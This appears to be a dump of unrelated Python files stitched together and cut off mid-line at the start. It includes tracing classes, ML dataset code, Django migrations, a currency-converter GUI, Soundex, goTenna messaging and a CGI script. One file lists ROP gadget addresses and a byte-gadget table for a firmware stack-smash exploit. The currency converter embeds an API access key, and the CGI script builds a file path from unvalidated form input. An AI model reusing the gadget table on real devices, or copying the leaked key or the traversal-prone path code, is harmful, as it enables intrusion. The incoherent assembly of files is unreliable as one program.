SystemExit(f"nonstatic_rightpad.{__name__}") class CallEvt(BaseEvt): symbol = "=>" def __init__(self, function=None, f_locals=None, callargs=None, varnames=None, stack=None): assert isinstance(f_locals,dict) self.function = function self.f_locals = f_locals self.callargs = callargs self.varnames = varnames self.stack = stack self.pid = id(self) def __str__(self): function, f_locals, pid = self.function, self.f_locals, self.pid assert isinstance(f_locals,dict) s = f"" return s def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) @property def pseudo_static(self): symbol = "=>" pseudo = super().pseudo_static(symbol) return pseudo @property def nonstatic(self): function, callargs = self.function, self.callargs fmtdlns = prettyprinter.pformat(self.callargs).splitlines() _first_as_str,*_rest_as_list = fmtdlns joinstr = '\n' + self.indent(length=len(function)) rv = f"{function}{_first_as_str}\n{joinstr.join(_rest_as_list)}\n" return rv def pformat(self,count,filename,lineno,event): static_vars = (count,filename,lineno,event) s = f"{self.static(static_vars)}{self.pseudo_static}{self.nonstatic}" s2 = f"{self.pseudo_static}{self.nonstatic}" return s2 class LineEvt(BaseEvt): symbol = " _" def __init__(self, source=None, stack=None): self.source = source self.stack = stack self.pid = id(self) def __str__(self): source, pid = self.source, self.pid s = f"" return s def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) def indent(self,char='\u0020'): idt = char * (len(self.stack)+1) return idt @property def pseudo_static(self): symbol = " _" pseudo = super().pseudo_static(symbol) return pseudo @property def nonstatic(self): source = self.source return source def pformat(self,count,filename,lineno,event): static_vars = (count,filename,lineno,event) s = f"{self.static(static_vars)}{self.pseudo_static}{self.nonstatic}" s2 = f"{self.pseudo_static}{self.nonstatic}" return s2 class RetnEvt(BaseEvt): symbol = "<=" def __init__(self, function, arg, stack=None): self.function = function self.arg = arg self.stack = stack self.id = id(self) def __str__(self): function, arg, pid = self.function, self.arg, self.pid s = f"" return s def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) @property def pseudo_static(self): symbol = "<=" pseudo = super().pseudo_static(symbol) return pseudo @property def nonstatic(self): function, arg = self.function, self.arg fmtdlns = prettyprinter.pformat(arg).splitlines() _first,*_rest = fmtdlns joinstr = '\n' + self.indent(length=len(function)) rv = f"{function}{_first}\n{joinstr.join(_rest)}\n" return rv def pformat(self,count,filename,lineno,event): static_vars = (count,filename,lineno,event) s = f"{self.static(static_vars)}{self.pseudo_static}{self.nonstatic}" s2 = f"{self.pseudo_static}{self.nonstatic}" return s2 class ExcpEvt(BaseEvt): symbol = " !" def __init__(self, function, arg, stack=None): self.function = function self.arg = arg self.stack = stack self.id = id(self) def __str__(self): function, arg, pid = self.function, self.arg, self.pid s = f"" return s def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) @property def pseudo_static(self): symbol = " !" pseudo = super().pseudo_static(symbol) return pseudo @property def nonstatic(self): function, arg = self.function, self.arg fmtdlns = prettyprinter.pformat(arg).splitlines() _first,*_rest = fmtdlns joinstr = '\n' + self.indent(length=len(function)) rv = f"{function}{_first}\n{joinstr.join(_rest)}\n" return rv def pformat(self,count,filename,lineno,event): static_vars = (count,filename,lineno,event) s = f"{self.static(static_vars)}{self.pseudo_static}{self.nonstatic}" s2 = f"{self.pseudo_static}{self.nonstatic}" return s2 class State: SYS_PREFIX_PATHS = set(( sys.prefix, sys.exec_prefix, os.path.dirname(os.__file__), os.path.dirname(collections.__file__),)) _counter = count(0) def __init__(self, frame, event, arg): # wf(repr(arg)+"\n",'logs/01.initial_arg.state.log', 'a') # TODO: must uncomment self.frame = frame self.event = event self.arg = arg self.callargs = {a:inspect.getargvalues(frame).locals[a] for a in inspect.getargvalues(frame).args} self.st_count = next(State._counter) self.initialize() def initialize(self): self.locals = self.frame.f_locals self.globals = self.frame.f_globals self.function = self.frame.f_code.co_name self.function_object = self.frame.f_code self.module = self.frame.f_globals.get('__name__','') self.filename = self.frame.f_code.co_filename self.lineno = self.frame.f_lineno self.code = self.frame.f_code self.stdlib = True if self.filename.startswith(SYS_PREFIX_PATHS) else False self.source = linecache.getline(self.filename, self.lineno, self.frame.f_globals) self.stack = None self._call = None self._line = None self._return = None self._exception = None self._serialized_arg = None self._serialized_locals = None @cached_property def format_filename(self): if not isinstance(self.filename,Path): filename = Path(self.filename) stem = f"{filename.stem:>10.10}" return stem _stack = [] @property def format_call(self): raise NotImplementedError("Must implement PickleableState.format_call") @property def format_line(self): raise NotImplementedError("Must implement PickleableState.format_line") @property def format_return(self): raise NotImplementedError("Must implement PickleableState.format_return") @property def format_exception(self): raise NotImplementedError("Must implement PickleableState.format_exception") class PickleableFrame: def __init__(self, kwds): self.filename = kwds['filename'] self.lineno = kwds['lineno'] self.function = kwds['function'] self.local_vars = kwds['local_vars'] self.code_context = kwds['code_context'] self.st_count = kwds['count'] self.f_code = kwds['f_code'] def __str__(self,color=False): return prettyprinter.pformat(self.__dict__) class PickleableState: def __init__(self, kwds): self.attrs = list(kwds.keys()) self.frame: PickleableFrame = kwds['frame'] self.event: str = kwds['event'] self.arg: Any = kwds['arg'] self.callargs: List = kwds['callargs'] self.f_locals: Dict = kwds['f_locals'] self.f_code = self.frame.f_code self.st_count: int = kwds['st_count'] self.function: str = kwds['function'] self.module: str = kwds['module'] self.filename: str = kwds['format_filename'] self.lineno: int = kwds['lineno'] self.stdlib: bool = kwds['stdlib'] self.source: str = kwds['source'] self.stack: List[str] = kwds['stack'] def __str__(self): l = [] for attr in self.attrs: l.append(f"{attr}={getattr(self,attr,'None')}") s = "\n".join(l) return s def __iter__(self): return ((k,v) for k,v in self.asdict().items()) def asdict(self): return self.__dict__ @property def indent(self): idt = '\u0020' * (len(PickleableState._stack)-1) return idt _stack = [] @property def format_call(self): PickleableState._stack.append(f"{self.module}.{self.function}") self.stack = PickleableState._stack[:] callevt = CallEvt( self.function, self.f_locals, self.callargs, self.f_code.co_varnames[:self.f_code.co_argcount], self.stack ) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = callevt.static(static_vars),callevt.pseudo_static,callevt.nonstatic return static+pseudo+nonsta def pkl_format_call(self): PickleableState._stack.append(f"{self.module}.{self.function}") self.stack = PickleableState._stack[:] callevt = CallEvt( self.function, self.f_locals, self.callargs, self.f_code.co_varnames[:self.f_code.co_argcount], self.stack ) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = callevt.static(static_vars),callevt.pseudo_static,callevt.nonstatic return (static, pseudo, nonsta) @property def format_line(self): lineevt = LineEvt(self.source, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = lineevt.static(static_vars),lineevt.pseudo_static,lineevt.nonstatic self.stack = PickleableState._stack[:] return static+pseudo+nonsta def pkl_format_line(self): lineevt = LineEvt(self.source, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = lineevt.static(static_vars),lineevt.pseudo_static,lineevt.nonstatic self.stack = PickleableState._stack[:] return (static, pseudo, nonsta) @property def format_return(self): retnevt = RetnEvt(self.function, self.arg, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = retnevt.static(static_vars),retnevt.pseudo_static,retnevt.nonstatic # if PickleableState._stack and PickleableState._stack[-1] == f"{self.module}.{self.function}": # PickleableState._stack.pop() if PickleableState._stack: PickleableState._stack.pop() self.stack = PickleableState._stack[:] return static+pseudo+nonsta def pkl_format_return(self): retnevt = RetnEvt(self.function, self.arg, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = retnevt.static(static_vars),retnevt.pseudo_static,retnevt.nonstatic if PickleableState._stack: PickleableState._stack.pop() self.stack = PickleableState._stack[:] return (static, pseudo, nonsta) @property def format_exception(self): excpevt = ExcpEvt(self.function, self.arg, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = excpevt.static(static_vars),excpevt.pseudo_static,excpevt.nonstatic self.stack = PickleableState._stack[:] return static+pseudo+nonsta def pkl_format_exception(self): excpevt = ExcpEvt(self.function, self.arg, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = excpevt.static(static_vars),excpevt.pseudo_static,excpevt.nonstatic self.stack = PickleableState._stack[:] return (static, pseudo, nonsta) class PickleableGenerator: def __init__(self,state,f_locals,pid): self.state = state self.locals = f_locals self.pid = pid def __str__(self): state, f_locals, pid = self.state, self.locals, self.pid s = f"" return s class PickleableEnviron: def __init__(self, kwds): d = {} for k,v in kwds.items(): if ':' in v: v = prettyprinter.pformat(v.split(':')) # if k == "LS_COLORS": v = prettyprinter.pformat(v.split(':')) setattr(self, k, kwds[k]) def __str__(self,color=False): return prettyprinter.pformat(self.__dict__) class PickleableTraceback: def __init__(self,lasti,lineno): self.lasti = lasti self.lineno = lineno class GenericPickleableMapping: pass class PickleableOptparseOption: def __init__(self,module,classname): self.module = module self.classname = classname self.id = id(self) # 0x%x: def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) def __str__(self): l = [] for k,v in self.__dict__.items(): l.append(f"{k}={v}") s = f"{self.module}.{self.classname}, {id=}" return s 1-10 import os from torch.utils.data import Dataset, DataLoader from transformers import BertTokenizer import configs from src.data_utils import read_lines, process_jsonl2io_parallel class FeverDatasetFinetune(Dataset): def __init__(self, filepath, max_length=512, padding='max_length', truncation=True): super(FeverDatasetFinetune, self).__init__() lines = read_lines(filepath) # Tuple of input, class label self.dataset = process_jsonl2io_parallel(lines) self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') self.padding = padding self.truncation = truncation self.max_length = max_length def __len__(self): return len(self.dataset) def __getitem__(self, index): input_sentence = self.dataset[index][0] class_label = self.dataset[index][1] encoded_input = self.tokenizer(text=input_sentence, max_length=self.max_length, padding=self.padding, truncation=self.truncation, return_tensors="pt" ) return encoded_input, class_label class FeverDatasetEditor(Dataset): def __init__(self, filepath, max_length=512, padding='max_length', truncation=True): super(FeverDatasetEditor, self).__init__() lines = read_lines(filepath) dataset = FeverDatasetFinetune(os.path.join(configs.DATA_DIR, 'fever', 'dev.jsonl')) print(dataset) dev_loader = DataLoader(dataset, batch_size=1, shuffle=True) kevangel79/poem-20 # Generated by Django 2.2.5 on 2019-10-14 11:17 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('poem_super_admin', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='metrictemplate', name='cloned', ), ] """ @Time : 202/16/19 16:33 @Author : TaylorMei @Email : @Project : iccv @File : compute_overlap.py @Function: """ import os import numpy as np import skimage.io import skimage.transform import matplotlib.pyplot as plt from matplotlib import cm import seaborn as sns image_path = '/home/iccd/data/msd9/test/image/' mask_json_path = '/home/iccd/data/msd9/test/mask/' # image_path = '/home/iccd/data/2019/msd9_all/all_images/' # mask_json_path = '/home/iccd/data/2019/msd9_all/all_masks/' imglist = os.listdir(image_path) print(len(imglist)) overlap = np.zeros([256, 256], dtype=np.float64) tall, wide = 0, 0 for i, imgname in enumerate(imglist): print(i, imgname) name = imgname.split('.')[0] mask = skimage.io.imread(mask_json_path + name + '.png') height = mask.shape[0] width = mask.shape[1] if height > width: tall += 1 else: wide += 1 mask = skimage.transform.resize(mask, [256, 256], order=0) mask = np.where(mask != 0, 1, 0).astype(np.float64) overlap += mask overlap = overlap / len(imglist) overlap_normalized = (overlap - np.min(overlap)) / (np.max(overlap) - np.min(overlap)) skimage.io.imsave('./msd9_test.png', (overlap*255).astype(np.uint8)) skimage.io.imsave('./msd9_test_normalized.png', overlap_normalized) print(tall, wide) f, ax = plt.subplots() sns.set() ax = sns.heatmap(overlap, ax=ax, cmap=cm.summer, cbar=False) ax.set_xticklabels([]) ax.set_yticklabels([]) plt.xticks([]) plt.yticks([]) plt.show() viniaraujoo/Recommender-system /anaconda2/lib/python2.7/os.py# -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals from django.shortcuts import redirect, render from django.core.urlresolvers import reverse from django.contrib import messages from django.contrib.messages.views import SuccessMessageMixin from django.views.generic import DetailView, ListView, RedirectView, \ UpdateView, CreateView from django.contrib.auth.mixins import LoginRequiredMixin from .models import User from .models import Feedback from .forms import FeedbackForm class UserFeedback(LoginRequiredMixin, SuccessMessageMixin, CreateView): #success_message = 'Thanks for contacting us, we will get back to you # shortly.' def feedback(request): if request.method == "POST": form = FeedbackForm(request.POST) if form.is_valid(): feedback = form.save(commit=False) feedback.user = request.user feedback.save() messages.success(request, '') return reverse('comunity') #return reverse('users:detail', # kwargs={'username': request.user.username}) # 'email': request.user.email, else: form = FeedbackForm()# return render(request, 'users/user_feedback.html', { 'user': request.user.name, 'form': form }) class UserDetailView(LoginRequiredMixin, DetailView): model = User slug_field = 'username' slug_url_kwarg = 'username' class UserRedirectView(LoginRequiredMixin, RedirectView): permanent = False def get_redirect_url(self): return reverse('users:detail', kwargs={'username': self.request.user.username}) class UserUpdateView(LoginRequiredMixin, UpdateView): fields = ['name', ] model = User # send the user back to their own page after a successful update def get_success_url(self): return reverse('users:detail', kwargs={'username': self.request.user.username}) def get_object(self): # Only get the User record for the user making the request return User.objects.get(username=self.request.user.username) class UserListView(LoginRequiredMixin, ListView): model = User slug_field = 'username' slug_url_kwarg = 'username' LowerDeez/ok-redirectsok_redirects/migrations/0005_auto_20210112_0814.py # Generated by Django 2.1.4 on 2021-01-12 08:14 from django.db import migrations, models import ok_redirects.fields class Migration(migrations.Migration): dependencies = [ ('ok_redirects', '0004_auto_20201218_1122'), ] operations = [ migrations.AddField( model_name='redirect', name='to_language', field=models.CharField(blank=True, choices=[('en', 'English'), ('ru', 'Russian'), ('uk', 'Ukraine')], help_text='Leave blank to redirect to an activated language', max_length=5, verbose_name='to language'), ), migrations.AlterField( model_name='redirect', name='languages', field=ok_redirects.fields.MultipleChoiceArrayField(base_field=models.CharField(blank=True, choices=[('en', 'English'), ('ru', 'Russian'), ('uk', 'Ukraine')], max_length=2), blank=True, default=['en', 'ru', 'uk'], size=None, verbose_name='Languages to check redirect'), ), ] # Values here for firmware version 1.16 # I've spent more time analyzing this version so far, # but it seems to be relatively rare. Seems to come from # a newer Mask ROM production batch. # This should be reading from a var we can try writing word_addr = 0x3ae # An okay place to return from the stack smash mainloop_safe_spot = 0x818 # RAM addresses factory_temp_ram = 0x100 ep1_buffer = 0x280 stack_base = 0x443 timer0_funcptr = 0x39d rop_addr = 0x500 counter_addr = 0x38c ep1flags = 0x1D scanflags = 0x14 adc_result = 0x3a1 scan_postadc_callback = 0x39d # Code gadgets ret = 0x244 infinite_loop = 0x1ac ldw_spl_popw_r0 = 0x26f1 popw_spl_r0 = 0x7d8 popw_r0 = 0x2a2c popw_r3 = 0xe1b popw_r2_r3_r4 = 0x13cb copy_codememR3_ramR2_countR4 = 0x2a30 stw_r3_ep0ack_ld04_popw_r2_r4_r5_r7_r6 = 0x23ec st_r1_ep0ackstall_popw_r2 = 0x1e42 timer0_disable = 0x29ca timer0_set_funcR3_timeoutR2 = 0x2983 adc_shutdown = 0xb89 memcpy_destR2_srcR3_countR4 = 0x29e0 feb0_loader = 0xb97 ep1sta_bit3_set = 0x25e1 wcon_set_D1h = 0xb82 incw_counter_popw_r2_r3_r4 = 0x13c8 r0_to_counter_popw_r2_r3 = 0xe12 pwm0_disable = 0x2f87 pwm1_disable = 0x2f11 # Lookup table for finding arbitrary bytes in code memory # missing values: 52 D2 byte_gadgets = [ 0x0044, 0x0002, 0x00a1, 0x009f, 0x009e, 0x009d, 0x0128, 0x009c, 0x009b, 0x009a, 0x0176, 0x0025, 0x0098, 0x00b2, 0x0097, 0x0096, 0x00be, 0x0095, 0x00ca, 0x0094, 0x00d2, 0x0093, 0x00dc, 0x0092, 0x00e4, 0x0091, 0x00ec, 0x0090, 0x00f4, 0x00f8, 0x008f, 0x0102, 0x0000, 0x010a, 0x010e, 0x008d, 0x01dd, 0x008c, 0x02da, 0x0258, 0x008b, 0x0259, 0x0015, 0x002d, 0x0045, 0x0089, 0x04fb, 0x025c, 0x0088, 0x02df, 0x025d, 0x004c, 0x025e, 0x0086, 0x025f, 0x02e2, 0x0085, 0x0261, 0x02e4, 0x0084, 0x02e5, 0x0263, 0x0083, 0x0220, 0x03f1, 0x0082, 0x0173, 0x0160, 0x0081, 0x0267, 0x07b8, 0x0080, 0x07eb, 0x02eb, 0x007f, 0x02ec, 0x026a, 0x007e, 0x0139, 0x01d8, 0x026c, 0x007d, None, 0x026e, 0x007c, 0x026f, 0x0839, 0x007b, 0x0589, 0x0271, 0x007a, 0x0272, 0x02f5, 0x0079, 0x1544, 0x0274, 0x0078, 0x02f7, 0x0275, 0x0077, 0x0276, 0x02f9, 0x0277, 0x0076, 0x01b6, 0x0279, 0x0075, 0x027a, 0x063e, 0x0074, 0x1be0, 0x027c, 0x0073, 0x02ff, 0x0001, 0x0072, 0x0301, 0x027f, 0x0071, 0x0280, 0x05ca, 0x0070, 0x1ad8, 0x0304, 0x006f, 0x0305, 0x0283, 0x006e, 0x01df, 0x006d, 0x01be, 0x01b9, 0x006c, 0x01b7, 0x0014, 0x006b, 0x01b8, 0x0187, 0x006a, 0x028a, 0x0069, 0x028b, 0x030e, 0x0068, 0x030f, 0x0067, 0x01e5, 0x028e, 0x0066, 0x028f, 0x0065, 0x0175, 0x0185, 0x0064, 0x0291, 0x0063, 0x0315, 0x0062, 0x0316, 0x0061, 0x0186, 0x0060, 0x0295, 0x005f, 0x0296, 0x005e, 0x005d, 0x0298, 0x005c, 0x005b, 0x0148, 0x005a, 0x0059, 0x0058, 0x014e, 0x0057, 0x0056, 0x0054, 0x0053, 0x0051, 0x004e, 0x0034, 0x02a0, 0x0b2d, 0x0242, 0x02a1, 0x02a2, 0x02a3, 0x0610, 0x02a4, 0x0327, 0x02a5, 0x037d, 0x02a6, 0x1875, 0x02a7, 0x032a, 0x02a8, 0x032b, 0x02a9, 0x07f0, 0x02aa, 0x02ab, 0x032e, 0x02ac, 0x0b64, 0x02ad, 0x0331, 0x02ae, 0x02af, None, 0x02b0, 0x001c, 0x02b1, 0x02b2, 0x0335, 0x02b3, 0x003c, 0x013c, 0x0337, 0x0338, 0x02b5, 0x02b6, 0x01aa, 0x02b7, 0x02b8, 0x19f7, 0x033c, 0x02b9, 0x02ba, 0x0747, 0x0745, 0x02bc, 0x02bd, 0x02be, 0x0740, 0x02bf, 0x0757, 0x0024, 0x0343, 0x02c1, 0x02c2, 0x02c3, 0x0346, 0x02c4, 0x0347, 0x02c5, 0x0191, 0x05f2, 0x0737, 0x0736, 0x075f, 0x06bb, 0x0784, 0x0177, 0x0003 ] Mirza-Samad-Ahmed-Baig/PYTHON_GUI_PROJECTS import tkinter as tk from tkinter import * from tkinter import ttk from datetime import datetime import requests from PIL import ImageTk, Image from tkinter import messagebox root = tk.Tk() root.geometry("600x270") root.title("Currency Converter") root.iconbitmap('icon.ico') root.maxsize(600,270) root.minsize(600,270) image = Image.open('currency.png') zoom = 0.5 #multiple image size by zoom pixels_x, pixels_y = tuple([int(zoom * x) for x in image.size]) img = ImageTk.PhotoImage(image.resize((pixels_x, pixels_y))) panel = Label(root, image = img) panel.place(x=190,y=35) def show_data(): amount = E1.get() from_currency = c1.get() to_currency = c2.get() url = 'http://api.currencylayer.com/live?access_key=4273d2c37f738367f08780b934ce7dda&format=1' if amount == '': messagebox.showerror("Currency Converter", "Please Fill the Amount") elif to_currency == '': messagebox.showerror("Currency Converter", "Please Choose the Currency") else: data = requests.get(url).json() currency = from_currency.strip()+to_currency.strip() amount = int(amount) cc = data['quotes'][currency] cur_conv = cc*amount E2.insert(0,cur_conv) text.insert('end',f'{amount} United State Dollar Equals {cur_conv} {to_currency} \n\n Last Time Update --- \t {datetime.now()}') def clear(): E1.delete(0,'end') E2.delete(0,'end') text.delete(1.0,'end') l1 = Label(root,text="USD Currency Converter Using Python", font=('verdana','10','bold')) l1.place(x=150,y=15) amt = Label(root,text="Amount",font=('roboto',10,'bold')) amt.place(x=20,y=15) E1 = Entry(root,width=20,borderwidth=1,font=('roboto',10,'bold')) E1.place(x=20,y=40) c1 = tk.StringVar() c2 = tk.StringVar() currencychoose1 = ttk.Combobox(root, width = 20, textvariable = c1, state='readonly',font=('verdana',10,'bold')) # Adding combobox drop down list currencychoose1['values'] = ( ' USD', ) currencychoose1.place(x=300,y=40) currencychoose1.current(0) E2 = Entry(root,width=20,borderwidth=1,font=('roboto',10,'bold')) E2.place(x=20,y=80) currencychoose2 = ttk.Combobox(root, width = 20, textvariable = c2, state='readonly',font=('verdana','10','bold')) # Adding combobox drop down list currencychoose2['values'] =('ALL', ' AFN', ' ARS', ' AWG', ' AUD', ' AZN', ' BSD', ' BBD', ' BYN', ' BZD ', ' BMD', ' BOB', 'BAM', ' BWP', ' BGN', ' BND', ' KHR', ' CAD', ' KYD', ' CLP', ' CNY', ' COP ', ' CRC', ' HRK', 'CUP', 'CZK', ' DKK', ' DOP', ' XCD', ' EGP', ' SVC', ' EUR', ' FKP', ' FJD', ' GHS ', ' GIP', ' GTQ', 'GGP', ' GYD', ' HNL ', ' HKD', ' HUF', ' ISK', ' INR', ' IDR', ' IRR', ' IMP ', ' ILS', ' JMD', 'JPY', 'KZT', ' KPW', ' KRW', ' KGS', ' LAK', ' LBP', ' LRD', ' MKD', ' MYR', ' MUR ', ' MXN', ' MNT', 'MZN', ' NAD', ' NPR', ' ANG', ' NZD ', ' NIO ', ' NGN', ' NOK', ' OMR ', ' PKR ', ' PAB', ' PYG', 'PEN', 'PHP', ' PLN', ' QAR', ' RON', ' RUB', ' SHP', ' SAR', ' RSD', ' SCR ', ' SGD ', ' SBD', ' SOS', 'ZAR', ' LKR', ' SEK ', ' CHF', ' SRD', ' SYP', ' TWD', ' THB', ' TTD', ' TRY ', ' TVD', ' UAH', 'GBP ', ' UYU', ' UZS ', ' VEF ', ' VND', ' YER', 'ZWD',) currencychoose2.place(x=300,y=80) currencychoose2.current() text = Text(root,height=7,width=52,font=('verdana','10','bold')) text.place(x=100,y=120) B = Button(root,text="Search",command=show_data,font=('verdana','10','bold'),borderwidth=2,bg="red",fg="white") B.place(x=20,y=120) clear = Button(root,text="Clear",command=clear,font=('verdana','10','bold'),borderwidth=2,bg="blue",fg="white") clear.place(x=20,y=170) root.mainloop() # <============ end code ==============>ryan12900/Test-Behavior-Driven-Development # -*- coding: utf-8 -*- ''' soundex ~~~~~~~~ This module implements soundex algorithm components. :copyright: (c) 2009-2012 by :copyright: (c) 2012-2014 by SILPA Developers :license: LGPL-3.0+, see LICENSE file for more details ''' _all_ = ["Soundex", "getInstance"] from itertools import repeat from silpa_common import servicemethod from silpa_common.charmap import get_language, charmap ''' Soundex class provides methods which can be used to perform Soundex phonetic algorithm on Indian languages as well as English. ''' _soundex_map = { "soundex_en": ["0", "1", "2", "3", "0", "1", "2", "0", "0", "2", "2", "4", "5", "5", "0", "1", "2", "6", "2", "3", "0", "1", "0", "2", "0", "2"], "soundex": ['0', 'N', '0', '0', 'A', 'A', 'B', 'B', 'C', 'C', 'P', 'Q', '0', 'D', 'D', 'D', 'E', 'E', 'E', 'E', 'F', 'F', 'F', 'F', 'G', 'H', 'H', 'H', 'H', 'G', 'I', 'I', 'I', 'I', 'J', 'K', 'K', 'K', 'K', 'L', 'L', 'M', 'M', 'M', 'M', 'N', 'O', 'P', 'P', 'Q', 'Q', 'Q', 'R', 'S', 'S', 'S', 'T', '0', '0', '0', '0', 'A', 'B', 'B', 'C', 'C', 'P', 'P', 'E', 'D', 'D', 'D', 'D', 'E', 'E', 'E', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', 'E', '0', '0', '0', '0', '0', '0', '0', '0', 'P', 'Q', 'Q', 'Q', '0', '0', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', 'J', 'J', 'Q', 'P', 'P', 'F'], } class Soundex(object): def soundexCode(self, char): '''Return the soundex code for given character :param char: Character whose soundex code is needed :return: Returns soundex code if character is found in charmap else returns 0 ''' lang = get_language(char) try: if lang == "en_US": return _soundex_map["soundex_en"][charmap[lang].index(char)] else: return _soundex_map["soundex"][charmap[lang].index(char)] except: # Case of exception KeyError because we don't have soundex # mapping for the character pass return 0 @servicemethod def soundex(self, name, length=8): '''Calculate soundex of given string This function calculates soundex for Indian language string as well as English string. This function is exposed as service method for JSONRPC in SILPA framework. :param name: String whose Soundex value to be calculated :param length: Length of final Soundex string, if soundex caculated is more than this it will be truncated to length. :return: Soundex string of `name' ''' sndx = [] fc = name[0] # translate alpha chars in name to soundex digits for c in name[1:].lower(): d = str(self.soundexCode(c)) # remove all 0s from the soundex code if d == '0': continue # duplicate consecutive soundex digits are skipped if len(sndx) == 0: sndx.append(d) elif d != sndx[-1]: sndx.append(d) # append first character to result sndx.insert(0, fc) if get_language(name[0]) == 'en_US': # Don't padd return ''.join(sndx) if len(sndx) < length: sndx.extend(repeat('0', length)) return ''.join(sndx[:length]) return ''.join(sndx[:length]) @servicemethod def compare(self, string1, string2): '''Compare soundex of given strings This function checks if 2 given strings are phonetically sounds same by doing soundex code comparison :param string1: First string for comparison :param string2: Second string for comparison :return: Returns 0 if both strings are same, 1 if strings sound phonetically same, 2 if strings are phonetically not same. We can't perform English cross language comparision if English string is passed as one function will return -1. ''' # do a quick check if string1 == string2: return 0 string1_lang = get_language(string1[0]) string2_lang = get_language(string2[0]) if (string1_lang == 'en_US' and string2_lang != 'en_US') or \ (string1_lang != 'en_US' and string2_lang == 'en_US'): # Can't Soundex compare English and Indic string return -1 soundex1 = self.soundex(string1) soundex2 = self.soundex(string2) if soundex1[1:] == soundex2[1:]: # Strings sound phonetically same return 1 # Strings are not same return 2 def getInstance(): ''' Return Soundex instance This function returns instance of Soundex class and is used mainly by SILPA framework :return: Soundex instance ''' return Soundex() #!/usr/bin/env python # encoding: utf-8 """Group Polls 2 # Polls """ class d: """Group Question 2 ## Choice [/questions/{question_id}/choices/{choice_id}] + Parameters + question_id: 1 (required, number) - ID of the Question in form of an integer + choice_id: 1 (required, number) - ID of the Choice in form of an integer ### Vote on a Choice [POST] This action allows you to vote on a question's choice. + Response 201 + Headers Location: /questions/1 """ def e(): """Group Question 4 ### Create a New Question [POST] You may create your own question using this action. It takes a JSON object containing a question and a collection of answers in the form of choices. + question (string) - The question + choices (array[string]) - A collection of choices. + Request (application/json) { "question": "Favourite programming language?", "choices": [ "Swift", "Python", "Objective-C", "Ruby" ] } + Response 201 (application/json) + Headers Location: /questions/2 + Body { "question": "Favourite programming language?", "published_at": "2014-11-11T08:40:51.620Z", "url": "/questions/2", "choices": [ { "choice": "Swift", "url": "/questions/2/choices/1", "votes": 0 }, { "choice": "Python", "url": "/questions/2/choices/2", "votes": 0 }, { "choice": "Objective-C", "url": "/questions/2/choices/3", "votes": 0 }, { "choice": "Ruby", "url": "/questions/2/choices/4", "votes": 0 } ] } """ joshuafuller/pyGT """ goTenna App objects - part of pyGT https://github.com/sybip/pyGT """ from struct import pack, unpack from pyTLV import tlvPack, tlvRead from pycrc16 import crc from gtdefs import * # noqa: F403 # Message content types - GTA specific GTA_CONTENT_TEXT = 0 GTA_CONTENT_TEXT_LCTN = 1 # Text message with location attached GTA_CONTENT_LCTN_RES = 2 # Location response GTA_CONTENT_LCTN_REQ = 3 # Location request GTA_CONTENT_TEXT_LREQ = 4 # Text message with location request GTA_CONTENT_GROUP_KEY = 5 # Group setup information: GID, KEY and members GTA_CONTENT_PING = 7 # Ping request GTA_CONTENT_PUBK_REQ = 14 GTA_CONTENT_PUBK_RES = 15 def gtMakeGTABlobMsg(bodyTXT, fromTXT='API'): """ Assemble a GTA compatible message blob (suitable for feeding to gtMakeAPIMsg() ) """ blob = (tlvPack(MSGB_TLV_TYPE, "%d" % GTA_CONTENT_TEXT) + tlvPack(MSGB_TLV_NICK, fromTXT) + tlvPack(MSGB_TLV_TEXT, bodyTXT)) # append CRC and return return blob + pack("!H", crc(blob)) def gtReadGTABlob(blob): """ Break down a GTA message blob into its elements """ msg = {} # there's a CRC16 field at the end of the content blob; # check this first and stop if incorrect wantCRC = unpack('!H', blob[-2:])[0] haveCRC = crc(blob[:-2]) if wantCRC != haveCRC: print("CRC failed, want=%04x, have=%04x" % (wantCRC, haveCRC)) return False for type, length, value in tlvRead(blob[:-2]): msg[type] = value # Check for mandatory subelement MSGB_TLV_TYPE if MSGB_TLV_TYPE in msg: return msg return False phil65/PrettyQtprettyqt/gui/intvalidator.py from __future__ import annotations from prettyqt import gui from prettyqt.qt import QtGui QtGui.QIntValidator.__bases__ = (gui.Validator,) class IntValidator(QtGui.QIntValidator): def __repr__(self): return f"{type(self).__name__}({self.bottom()}, {self.top()})" def __getstate__(self): return dict(bottom=self.bottom(), top=self.top()) def __reduce__(self): return type(self), (self.bottom(), self.top()), None def __eq__(self, other: object): if not isinstance(other, type(self)): return False return self.bottom() == other.bottom() and self.top() == other.top() def set_range(self, lower: int | None, upper: int | None): if lower is None: lower = 2147483647 # number from docs if upper is None: upper = 2147483647 self.setRange(lower, upper) if __name__ == "__main__": val = IntValidator() val.setRange(0, 9) protein-bioinformatics/STAMPSadmin/scripts/curate-spectral-library.py #!/usr/bin/python3 import sqlite3 from cgi import FieldStorage import json conf = {} with open("../qsdb.conf", mode="rt") as fl: for line in fl: line = line.strip().strip(" ") if len(line) < 1 or line[0] == "#": continue token = line.split("=") if len(token) < 2: continue conf[token[0].strip(" ")] = token[1].strip(" ") print("Content-Type: text/html") print() form, action, species = None, None, None try: form = FieldStorage() action = form.getvalue('action') species = form.getvalue('species') except: print(-1) exit() if type(action) is not str or action not in ["count", "select", "update"]: print(-2) exit() spectral_lib = "%s/data/spectral_library_%s.blib" % (conf["root_path"], species) db = sqlite3.connect(spectral_lib) 